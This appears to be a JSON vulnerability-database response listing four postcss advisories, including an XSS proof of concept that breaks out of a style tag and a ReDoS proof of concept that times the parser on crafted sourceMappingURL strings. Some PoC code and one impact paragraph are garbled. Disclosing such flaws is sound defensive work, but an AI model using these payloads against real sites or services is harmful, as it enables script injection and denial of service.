{"ecosystem":"npm","package":"postcss","version":null,"bugs":[{"id":4116,"ecosystem":"npm","package_name":"postcss","affected_version":null,"fixed_version":"8.5.10","bug_id":"osv:GHSA-qx2v-qp2m-jg93","title":"PostCSS has XSS via Unescaped </style> in its CSS Stringify Output","description":"# PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output\n\n## Summary\n\nPostCSS v8.5.5 (latest) does not escape `</style>` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS values breaks out of the style context, enabling XSS.\n\n## Proof of Concept\n\n```javascript\nconst postcss = require('postcss');\n\n// Parse user CSS and re-stringify for page embedding\nconst userCSS = 'body { content: \"</style><script>alert(1)</script><style>\"; }';\nconst ast = postcss.parse(userCSS);\nconst output = ast.toResult().css;\nconst html = `<style>${output}</style>`;\n\nconsole.log(html);\n// <style>body { content: \"</style><script>alert(1)</script><style>\"; }</style>\n//\n// Browser: </style> closes the style tag, <script> executes\n```\n\n**Tested output** (Node.js v22, postcss v8.5.5):\n```\nInput: body { content: \"</style><script>alert(1)</script><style>\"; }\nOutput: body { content: \"</style><script>alert(1)</script><style>\"; }\nContains </style>: true\n```\n\n## Impact\n\nImpact non-bundler use cases since bundlers for XSS on their own. Requires some PostCSS plugin to have malware code, which can inject XSS to website.\n\n## Suggested Fix\n\nEscape `</style` in all stringified output values:\n```javascript\noutput = output.replace(/<\\/(style)/gi, '<\\\\/$1');\n```\n\n## Credits\nDiscovered and reported by [Sunil Kumar](https://tharvid.in) ([@TharVid](https://github.com/TharVid))","severity":"medium","status":"fixed","source":"osv","source_url":"https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93","labels":["CVE-2026-41305"],"created_at":"2026-04-26 03:00:13.717470+00:00","updated_at":"2026-04-26 03:00:13.717470+00:00"},{"id":4115,"ecosystem":"npm","package_name":"postcss","affected_version":"7.0.0","fixed_version":"7.0.36","bug_id":"osv:GHSA-hwj9-h5mp-3pm3","title":"Regular Expression Denial of Service in postcss","description":"The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23368","labels":["CVE-2021-23368"],"created_at":"2026-04-26 03:00:13.710982+00:00","updated_at":"2026-04-26 03:00:13.710982+00:00"},{"id":4114,"ecosystem":"npm","package_name":"postcss","affected_version":null,"fixed_version":"8.4.31","bug_id":"osv:GHSA-7fh5-64p2-3v2j","title":"PostCSS line return parsing error","description":"An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\\r` discrepancies, as demonstrated by `@font-face{ font:(\\r/*);}` in a rule.\n\nThis vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44270","labels":["CVE-2023-44270"],"created_at":"2026-04-26 03:00:13.686393+00:00","updated_at":"2026-04-26 03:00:13.686393+00:00"},{"id":4113,"ecosystem":"npm","package_name":"postcss","affected_version":"8.0.0","fixed_version":"8.2.13","bug_id":"osv:GHSA-566m-qj78-rww5","title":"Regular Expression Denial of Service in postcss","description":"The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \n```regex\n\\/\\*\\s* sourceMappingURL=(.*)\n```\n\n### PoC\n```js\nvar postcss = require(\"postcss\")\nfunction build_attack(n) {\n    var ret = \"a{}\"\n    for (var i = 0; i < n; i++) {\n        ret += \"/*# sourceMappingURL=\"\n    }\n    return ret + \"!\";\n}\n```\n```js\npostcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {\n    if (i % 1000 == 0) {\n        var time = Date.now();\n        var attack_str = build_attack(i) try {\n            postcss.parse(attack_str) var time_cost = Date.now() - time;\n            console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n        } catch (e) {\n            var time_cost = Date.now() - time;\n            console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n        }\n    }\n}\n```","severity":"medium","status":"fixed","source":"osv","source_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23382","labels":["CVE-2021-23382"],"created_at":"2026-04-26 03:00:13.655007+00:00","updated_at":"2026-04-26 03:00:13.655007+00:00"}],"total":4,"_cache":"hit"}